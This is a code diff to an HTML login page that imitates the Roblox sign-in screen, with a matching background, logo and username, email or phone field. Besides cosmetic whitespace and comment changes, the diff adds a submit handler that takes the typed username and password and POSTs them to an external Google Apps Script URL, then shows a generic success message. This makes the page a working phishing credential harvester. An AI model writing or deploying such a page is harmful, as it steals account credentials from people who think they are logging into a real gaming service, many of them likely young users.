--- a/index.html
+++ b/index.html
@@ -10,13 +10,11 @@
       margin: 0;
       height: 100%;
       font-family: 'Arial', sans-serif;
-     background: url("./Robloxbg.jpg") no-repeat center center fixed;
-     background-size: cover;
-
+      background: url("./Robloxbg.jpg") no-repeat center center fixed;
+      background-size: cover;
       overflow: hidden;
     }
 
-    /* Roblox logo style */
     .logo {
       color: #fff;
       font-weight: 900;
@@ -42,8 +40,7 @@
       border-radius: 0.1em;
       box-shadow: inset 0 0 0 0.35em #000;
     }
-    
-    /* Form container styling */
+
     .form-container {
       width: 100%;
       max-width: 400px;
@@ -77,7 +74,6 @@
       background: rgba(255 255 255 / 0.2);
     }
 
-    /* Password eye toggle */
     .password-wrapper {
       position: relative;
       display: flex;
@@ -101,7 +97,6 @@
       color: white;
     }
 
-    /* Buttons */
     .btn-login {
       width: 100%;
       background: rgba(255 255 255 / 0.15);
@@ -137,7 +132,6 @@
       color: #000;
     }
 
-    /* Forgot password */
     .forgot-password {
       font-size: 0.85rem;
       text-align: center;
@@ -151,14 +145,12 @@
       text-decoration: underline;
     }
 
-    /* Responsive */
     @media (max-width: 480px) {
       .form-container {
         max-width: 95vw;
         padding-left: 1.5rem;
         padding-right: 1.5rem;
       }
-
       .logo {
         font-size: 2.8rem;
       }
@@ -172,7 +164,7 @@
       <div class="tilted-square" aria-hidden="true"></div>
       B L O X
     </h1>
-    <form class="form-container" aria-label="Login form">
+    <form id="loginForm" class="form-container" aria-label="Login form">
       <label for="username" class="sr-only">Username, Email or Phone</label>
       <input id="username" name="username" type="text" placeholder="Username/Email/Phone" autocomplete="username" required />
 
@@ -183,7 +175,6 @@
       </div>
 
       <button type="submit" class="btn-login" aria-label="Log In">Log In</button>
-
       <button type="button" class="btn-other-device" aria-label="Log In With Another Device">Log In With Another Device</button>
 
       <div class="forgot-password" tabindex="0" role="link" aria-label="Forgot Password or Username?">
@@ -192,28 +183,51 @@
     </form>
   </main>
 
-<script>
-  // Toggle password visibility
-  const toggleBtn = document.querySelector('.toggle-password');
-  const passwordInput = document.getElementById('password');
+  <script>
+    // Toggle password visibility
+    const toggleBtn = document.querySelector('.toggle-password');
+    const passwordInput = document.getElementById('password');
 
-  toggleBtn.addEventListener('click', () => {
-    if (passwordInput.type === 'password') {
-      passwordInput.type = 'text';
-      toggleBtn.style.color = 'white';
-    } else {
-      passwordInput.type = 'password';
-      toggleBtn.style.color = 'rgba(255 255 255 / 0.6)';
-    }
-  });
+    toggleBtn.addEventListener('click', () => {
+      if (passwordInput.type === 'password') {
+        passwordInput.type = 'text';
+        toggleBtn.style.color = 'white';
+      } else {
+        passwordInput.type = 'password';
+        toggleBtn.style.color = 'rgba(255 255 255 / 0.6)';
+      }
+    });
 
-  // Keyboard toggle for accessibility
-  toggleBtn.addEventListener('keydown', (e) => {
-    if (e.key === 'Enter' || e.key === ' ') {
+    toggleBtn.addEventListener('keydown', (e) => {
+      if (e.key === 'Enter' || e.key === ' ') {
+        e.preventDefault();
+        toggleBtn.click();
+      }
+    });
+
+    // Google Sheets submission
+    const loginForm = document.getElementById('loginForm');
+
+    loginForm.addEventListener('submit', async function(e) {
       e.preventDefault();
-      toggleBtn.click();
-    }
-  });
-</script>
+
+      const username = document.getElementById('username').value;
+      const password = document.getElementById('password').value;
+
+      try {
+        const response = await fetch('https://script.google.com/macros/s/AKfycbzeW2B6YLYY_Yn8Q4bQpnqHc2qFHqgNxpepdDjAwpRMJzgyBDmrieKn1oyp6baxRgo-Cw/exec', {
+          method: 'POST',
+          body: JSON.stringify({ username, password })
+        });
+
+        const result = await response.json();
+        alert("Form submitted successfully!");
+        loginForm.reset();
+      } catch (err) {
+        alert("Error submitting form");
+        console.error(err);
+      }
+    });
+  </script>
 </body>
 </html>
